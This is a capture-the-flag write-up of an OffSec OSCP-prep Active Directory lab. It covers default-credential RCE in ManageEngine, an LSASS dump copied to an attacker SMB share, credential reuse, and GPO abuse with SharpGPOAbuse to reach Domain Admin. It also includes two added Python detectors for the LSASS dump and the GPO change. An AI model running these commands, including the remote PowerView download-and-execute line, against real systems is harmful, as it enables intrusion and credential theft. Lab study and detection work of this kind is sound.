OSCP Preparation - CHALLENGE_0 Secura - Writeup
Challenge 0 — OffSec Writeup
Date: 2026-04-10
Lab: OffSec Challenge Lab 0 (OSCP prep)
Forest: secura.yzx
Targets: 192.168.224.95 (SECURE), 192.168.224.96 (ERA), 192.168.224.97 (DC01)
Difficulty: Easy/Medium
OS: Windows 10 + Windows Server (AD DS)
Table of Contents
- Reconnaissance
- Foothold - ManageEngine Default Creds + Script Monitor RCE
- Credential Harvesting - LSASS Dump via comsvcs.dll
- Lateral Movement - SECURE to ERA
- Privilege Escalation - apache to administrator on ERA
- Lateral Movement - ERA to DC01
- Privilege Escalation - charlotte to Domain Admin via GPO Abuse
- Vulnerability Summary
- Kill Chain
Reconnaissance
Host discovery on the in-scope /24:
```
nmap -sn 192.168.224.0/24
```

Three live hosts (+ gateway):
- 192.168.224.95 — Windows 10, domain-joined (SECURE.secura.yzx)
- 192.168.224.96 — Windows Server (ERA)
- 192.168.224.97 — Windows Server 2016, AD DS (DC01.secura.yzx)
Service enumeration on SECURE:
```
nmap -p- --min-rate 2000 192.168.224.95
nmap -sVC -p 5001,8443,12000,44444 192.168.224.95
```

Key finding: ManageEngine Applications Manager listening on 8443/tcp (HTTPS), build 14710 Free Edition.
Foothold — ManageEngine Default Creds + Script Monitor RCE
1. Default Credentials
Browsing to https://192.168.224.95:8443/ exposes the AppManager login page. Default credentials work out of the box:
```
admin : admin
```

The About page confirms build 14710 (Free Edition), installation path C:\Program Files\ManageEngine\AppManager14, PostgreSQL backend.
2. Script Monitor Abuse
AppManager has a native Script Monitor feature that lets admins run arbitrary commands on the monitoring host. Since the AppManager service runs as LocalSystem, any command executed through this feature inherits SYSTEM privileges.
New Monitor → Script Monitor configuration:
```
Script Location:     Local Server
Script Type:         Command
Script / Command:    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Execution Directory: C:\Windows\Temp
Arguments:           -nop -w hidden -enc <base64 UTF-16LE reverse shell>
```

3. Reverse Shell as SYSTEM
```
nc -lvnp 9001
```

Triggering "Poll Now" on the newly created monitor:

```
listening on [any] 9001 ...
connect to [192.168.45.230] from (UNKNOWN) [192.168.224.95] 61570
PS C:\Windows\Temp> whoami
nt authority\system
```

4. First Flag
```
PS> type C:\Users\Administrator\Desktop\proof.txt
[REDACTED]
```

SECURE proof.txt obtained. No local.txt present — foothold went straight to SYSTEM, bypassing any low-priv user context.
Credential Harvesting — LSASS Dump via comsvcs.dll
As SYSTEM, LSASS is dumpable via the Windows LOLBIN comsvcs.dll (built-in, signed, not flagged by Defender).
5. Dump LSASS
```
PS> Get-Process lsass | Select-Object Id

Id
--
684

PS> rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 684 C:\Windows\Temp\lsass.dmp full
PS> dir C:\Windows\Temp\lsass.dmp
-a----        4/10/2026   3:40 PM       54642962 lsass.dmp
```

6. Exfiltration via impacket-smbserver
```
# Kali
mkdir /tmp/share && cd /tmp/share
impacket-smbserver -smb2support share .

# SECURE
copy C:\Windows\Temp\lsass.dmp \\192.168.45.230\share\
```

7. Offline Parsing with pypykatz
```
pypykatz lsa minidump lsass.dmp
```

Extracted credentials:
- SECURE\Administrator — NT hash
- SECURE$ — machine account NT hash + Kerberos AES256 keys
- ⭐ Credential Manager entry: apache : [REDACTED] (target label era.secura.local)
The CredMan entry is the "plaintext password via RCE" announced by the lab. The target label era.secura.local is just a textual hint pointing at the box named ERA.
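From the defender's side, the comsvcs.dll MiniDump call in step 5 is a high-fidelity detection opportunity. The Python below is an added example (not part of this writeup) that scans constructed process-creation events for rundll32 calling comsvcs.dll's MiniDump export, by name or by its ordinal #24, and resolves the dumped PID against the process list to confirm the target is lsass.exe; the event fields, and every PID and path other than 684 and lsass.dmp, are made up.

```python
"""Detect the comsvcs.dll MiniDump LOLBIN aimed at LSASS in process-creation telemetry.

Added example, not from the original writeup. Scans constructed process-creation
events (fields loosely modelled on Sysmon Event ID 1 / Security 4688) for rundll32
invoking comsvcs.dll's MiniDump export, then resolves the dumped PID against the
process list to confirm the target is lsass.exe. PIDs other than 684 and all paths
except the writeup's lsass.dmp are made up.
"""
import re

# rundll32 <path>comsvcs.dll, MiniDump <pid> <out> full -- the export may also be
# called by ordinal (#24) and spacing/casing vary, so match loosely.
COMSVCS_MINIDUMP = re.compile(
    r"comsvcs(\.dll)?\s*,\s*(#\s*24|MiniDump)\s+(\d+)\s+(\S+)", re.IGNORECASE)

# Constructed sample telemetry: (pid, image, command_line)
SAMPLE_EVENTS = [
    (684, r"C:\Windows\System32\lsass.exe", r"C:\Windows\system32\lsass.exe"),
    (1337, r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 684 C:\Windows\Temp\lsass.dmp full"),
    (2048, r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\comsvcs.dll, #24 3200 C:\Temp\app.dmp full"),
    (3200, r"C:\Program Files\App\app.exe", r"app.exe --serve"),
    (4100, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),
]

def find_minidump_calls(events):
    """Return [(caller_pid, target_pid, target_image, dump_path)] for every MiniDump call."""
    by_pid = {pid: image for pid, image, _ in events}
    hits = []
    for pid, image, cmdline in events:
        if not image.lower().endswith("rundll32.exe"):
            continue
        m = COMSVCS_MINIDUMP.search(cmdline)
        if not m:
            continue
        target = int(m.group(3))
        hits.append((pid, target, by_pid.get(target, "<unknown>"), m.group(4)))
    return hits

def lsass_dump_alerts(events):
    """Keep only calls whose target resolves to lsass.exe: high-confidence credential theft."""
    return [h for h in find_minidump_calls(events)
            if h[2].lower().endswith("lsass.exe")]

if __name__ == "__main__":
    for caller, target, image, dump in lsass_dump_alerts(SAMPLE_EVENTS):
        print(f"ALERT rundll32 pid {caller} dumped lsass pid {target} ({image}) to {dump}")
```

Any non-lsass MiniDump hit is still worth a lower-severity alert, since comsvcs.dll is rarely a legitimate way to take process dumps.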
Lateral Movement — SECURE → ERA
8. Auth Scoping
```
# Domain auth fails
netexec smb 192.168.224.96 -u apache -p '[REDACTED]'
# STATUS_LOGON_FAILURE (secura.yzx\apache)

# Local auth succeeds
netexec smb 192.168.224.96 -u apache -p '[REDACTED]' --local-auth
# [+] ERA\apache
netexec winrm 192.168.224.96 -u apache -p '[REDACTED]' --local-auth
# [+] ERA\apache (Pwn3d!)
```

apache is a local account on ERA with WinRM access (via BUILTIN\Remote Management Users).
9. Interactive Shell
```
evil-winrm -i 192.168.224.96 -u apache -p '[REDACTED]'
```

whoami /all reveals a low-privilege context: Medium IL, no SeImpersonate / SeDebug / SeAssignPrimaryToken. The Pwn3d! label from netexec only means the account can execute commands over WinRM — not real local admin. No Potato family applicable.
Privilege Escalation — apache → administrator on ERA
10. Service Inventory
```
Get-Process | Where-Object { $_.ProcessName -match 'mysql|httpd|xampp' }
```

ERA has a full XAMPP installation at C:\xampp\:
- MariaDB (mysqld) running on 0.0.0.0:3306
- Apache not running, htdocs empty
Connecting to MariaDB from Kali fails with ERROR 1130 Host not allowed to connect (the grants are restricted by source host). Access must come from a local client.
11. MariaDB Access via XAMPP Default Creds
Using the local C:\xampp\mysql\bin\mysql.exe client from the WinRM shell:
```
apache : [REDACTED]  → denied
root   : (blank)     → ✅
```

XAMPP's default root account has no password.
12. Credential Dump from creds.creds
```
SHOW DATABASES;
-- creds, information_schema, mysql, performance_schema, phpmyadmin, test
USE creds; SELECT * FROM creds;
+---------------+-----------------+
| name          | pass            |
+---------------+-----------------+
| administrator | [REDACTED]      |
| charlotte     | [REDACTED]      |
+---------------+-----------------+
```

13. Credential Spraying
Parallel spray via bash background jobs against SECURE, ERA, DC01 on SMB/WinRM/LDAP. Results saved to Evidence/Scans/AD Enumeration/spray_results.txt:
- ERA\administrator : [REDACTED] → local admin on ERA (SMB [+], WinRM [+] Pwn3d!)
- secura.yzx\charlotte : [REDACTED] → valid domain user, WinRM Pwn3d! on DC01
- administrator → fails on SECURE and on the domain
- charlotte → not a local user anywhere
14. ERA Flags
```
evil-winrm -i 192.168.224.96 -u administrator -p '[REDACTED]'
PS> type C:\Users\Administrator\Desktop\proof.txt
[REDACTED]
PS> type C:\Users\apache\Desktop\local.txt
[REDACTED]
```

ERA proof.txt and local.txt obtained. Note: local.txt lives in the domain user apache profile (C:\Users\apache\), not the local apache.ERA profile — confirming two different SIDs with the same sAMAccountName.
Lateral Movement — ERA → DC01
15. WinRM as charlotte
```
evil-winrm -i 192.168.224.97 -u charlotte -p '[REDACTED]'

User:   secura\charlotte
Groups: BUILTIN\Remote Management Users, BUILTIN\Pre-Windows 2000 Compatible Access
Privs:  SeMachineAccountPrivilege, SeImpersonatePrivilege
IL:     High
```

charlotte has WinRM access to the DC and SeImpersonatePrivilege, but is not a member of Administrators yet — initially only a domain user with RemoteShell rights.
16. DC Local Flag
```
PS> type C:\Users\charlotte\Desktop\local.txt
[REDACTED]
```

DC01 local.txt obtained. C:\Users\Administrator\Desktop\proof.txt is access denied — privilege escalation required.
Privilege Escalation — charlotte → Domain Admin via GPO Abuse
17. GPO Enumeration with PowerView
PowerView loaded in-memory over HTTP from the Kali attacker:
```
IEX (New-Object Net.WebClient).DownloadString('http://192.168.45.230/PowerView.ps1')
Get-DomainGPO | ForEach-Object {
    Get-DomainObjectAcl -ResolveGUIDs -Identity $_.Name |
        Where-Object { $_.SecurityIdentifier -match 'S-1-5-21-.*-1104' }
}
```

Result: the Default Domain Policy (GUID {31B2F340-016D-11D2-945F-00C04FB984F9}) has an explicit ACE granting charlotte (SID ...-1104) the rights WriteDacl, WriteOwner, WriteProperty, GenericExecute.
This is the misconfiguration: Default Domain Policy is linked to the domain root, which means it applies to the DC itself — any code injected into this GPO runs as SYSTEM on the DC at next gpupdate.
18. Failed SharpGPOAbuse Attempts
First tried --AddComputerTask (immediate scheduled task injection):
```
.\SharpGPOAbuse.exe --AddComputerTask `
    --TaskName "Update" `
    --Author "secura.yzx\Administrator" `
    --Command "cmd.exe" `
    --Arguments '/c net group "Domain Admins" charlotte /add /domain' `
    --GPOName "Default Domain Policy"
```

The GPO was modified successfully, but PowerShell's argument tokenizer in WinRM stripped the inner quotes, and the resulting ScheduledTasks.xml contained:

```
<Arguments>/c net group Domain</Arguments>
```

→ truncated at the space, invalid command.
Retried with -EncodedCommand <base64 UTF-16LE> to avoid quote issues:
```
[!] Unknown argument error.
[!] Exiting...
```

SharpGPOAbuse's own argument parser interprets the leading - in -EncodedCommand (inside the Arguments value) as a new CLI flag. Dead end.
19. --AddLocalAdmin (Clean Approach)
Pivot to the cleaner mode: add charlotte to Restricted Groups → BUILTIN\Administrators. No shell-quoting, no encoding.
```
.\SharpGPOAbuse.exe --AddLocalAdmin `
    --UserAccount charlotte `
    --GPOName "Default Domain Policy"
```

```
[+] SID Value of charlotte = S-1-5-21-3453094141-4163309614-2941200192-1104
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\secura.yzx\SysVol\secura.yzx\Policies\{31B2F340-...}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
```

SharpGPOAbuse patched GptTmpl.inf in SysVol, adding charlotte to the [Group Membership] section as a member of *S-1-5-32-544 (BUILTIN\Administrators).
20. Force Policy Refresh
```
gpupdate /force
# Computer Policy update has completed successfully.
# User Policy update has completed successfully.
```

Key insight: on a Domain Controller, BUILTIN\Administrators is the effective Domain Admin group (DCSync rights, NTDS.dit access, full filesystem, interactive logon). Adding a user here is equivalent to making them DA — without ever touching the Domain Admins group.
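A defender can catch the Restricted Groups change from steps 19 and 20 by auditing the GptTmpl.inf files in SysVol rather than watching group membership alone. The Python below is an added example, not from the writeup or from SharpGPOAbuse, that parses the [Group Membership] section and flags any member of *S-1-5-32-544 missing from an allowlist; the sample file contents are constructed (only the RID 1104 SID is taken from the writeup) and the allowlisted RID 500/512 SIDs used in the test are assumptions.

```python
"""Audit a GptTmpl.inf [Group Membership] section for unexpected Restricted Groups members.

Added example, not part of the original writeup or of SharpGPOAbuse. Parses the INI-style
text that the --AddLocalAdmin step writes into SysVol and flags every member of
BUILTIN\\Administrators (*S-1-5-32-544) that is not on a defender-maintained allowlist.
The sample contents are constructed; only the RID 1104 SID comes from the writeup.
On disk the file is UTF-16LE, so read it with encoding="utf-16" before calling these.
"""
import re

ADMINS_SID = "S-1-5-32-544"  # BUILTIN\Administrators

# Constructed sample: GptTmpl.inf after the Restricted Groups change.
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-3453094141-4163309614-2941200192-1104
"""

def parse_group_membership(inf_text):
    """Return {group_sid: [member, ...]} from [Group Membership].

    Keys look like '*<SID>__Members' / '*<SID>__Memberof'; values are comma separated
    and a leading '*' marks a SID rather than a name. Only __Members lines are kept.
    """
    members, in_section = {}, False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[group membership]"
            continue
        if not in_section or "=" not in line:
            continue
        key, _, value = line.partition("=")
        m = re.fullmatch(r"\*?(S-1-[\d-]+)__Members", key.strip(), re.IGNORECASE)
        if m:
            members[m.group(1).upper()] = [v.strip().lstrip("*")
                                           for v in value.split(",") if v.strip()]
    return members

def unexpected_admins(inf_text, allowed_sids):
    """Members of BUILTIN\\Administrators that are not in the allowlist (any hit is an alert)."""
    allowed = {s.upper() for s in allowed_sids}
    return [m for m in parse_group_membership(inf_text).get(ADMINS_SID, [])
            if m.upper() not in allowed]
```

Run it over every GptTmpl.inf under the domain's Policies share on each refresh of the GPT.ini versionNumber, and treat a non-empty result for the Default Domain Policy as a priority incident, since that policy is linked to the domain root and applies to the DCs themselves.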
21. Re-login → Elevated Token
Disconnect and reconnect via evil-winrm to get a fresh Kerberos token with the new group membership:
```
evil-winrm -i 192.168.224.97 -u charlotte -p '[REDACTED]'
```

```
USER INFORMATION: secura\charlotte

GROUP INFORMATION:
BUILTIN\Administrators                      S-1-5-32-544 (Group owner)
BUILTIN\Remote Management Users
BUILTIN\Pre-Windows 2000 Compatible Access
Mandatory Label\High Mandatory Level

PRIVILEGES:
SeDebugPrivilege, SeBackupPrivilege, SeRestorePrivilege,
SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege,
SeSecurityPrivilege, SeSystemEnvironmentPrivilege, SeEnableDelegationPrivilege,
SeManageVolumePrivilege, ...
```

Full SYSTEM-tier privilege set on the DC.
22. Final Flag
```
PS C:\Users> dir

Mode    Name
----    ----
d-----  Administrator.DC01    ← profile created pre-domain-join
d-----  charlotte
d-r---  Public
d-----  TEMP

PS C:\Users> type C:\Users\Administrator.DC01\Desktop\proof.txt
[REDACTED]
```

DC01 proof.txt obtained.
The profile suffix .DC01 is a forensic artifact: the Administrator profile on disk was created when the server was still standalone (hostname DC01), before being promoted to a Domain Controller. After promotion, the Administrator user became the domain account, but the legacy local profile directory retained its hostname suffix. Hence Administrator.DC01 instead of the usual Administrator.
Vulnerability Summary
| # | Vulnerability | CVE | Impact |
|---|---|---|---|
| 1 | ManageEngine AppManager default credentials (admin:admin) | - | Web console access |
| 2 | AppManager Script Monitor arbitrary command execution as LocalSystem | - | RCE as SYSTEM on SECURE |
| 3 | LSASS accessible to SYSTEM + cleartext CredMan storage | - | Recovery of apache plaintext password |
| 4 | Reused local credentials across domain-joined host | - | Lateral movement SECURE → ERA |
| 5 | XAMPP MariaDB default root with blank password | - | Local database access on ERA |
| 6 | Plaintext credential storage in application DB (creds.creds) | - | Discovery of administrator + charlotte creds |
| 7 | Insecure DACL on Default Domain Policy — WriteDacl granted to low-priv user | - | GPO-based privilege escalation to Domain Admin |
| 8 | GPO Restricted Groups abuse via SharpGPOAbuse | - | Persistence as BUILTIN\Administrators on DC |
Kill Chain
```
secura.yzx forest
│
├─[1] SECURE (.95) Win10 domain-joined
│   └─ ManageEngine AppManager 8443 — default creds admin:admin
│       └─ Script Monitor (PowerShell -enc) → reverse shell as SYSTEM
│           ├─ proof.txt [REDACTED]
│           └─ LSASS dump (comsvcs.dll MiniDump) → pypykatz
│               ├─ SECURE\Admin NT hash
│               └─ ⭐ CredMan: apache : [REDACTED]
│
├─[2] ERA (.96) XAMPP + MariaDB
│   └─ netexec --local-auth apache → WinRM (low-priv)
│       └─ MariaDB: XAMPP root blank password
│           └─ Dump creds.creds
│               ├─ administrator : [REDACTED] → local admin ERA
│               │   ├─ proof.txt [REDACTED]
│               │   └─ local.txt [REDACTED]
│               └─ ⭐ charlotte : [REDACTED] → domain user + WinRM on DC
│
└─[3] DC01 (.97) secura.yzx Domain Controller
    └─ WinRM as charlotte (BUILTIN\Remote Management Users)
        ├─ local.txt [REDACTED]
        └─ PowerView → WriteDacl on Default Domain Policy granted to charlotte
            └─ SharpGPOAbuse --AddLocalAdmin → GptTmpl.inf Restricted Groups
                └─ gpupdate /force → BUILTIN\Administrators on DC
                    └─ proof.txt [REDACTED] ☠️ DOMAIN ADMIN
```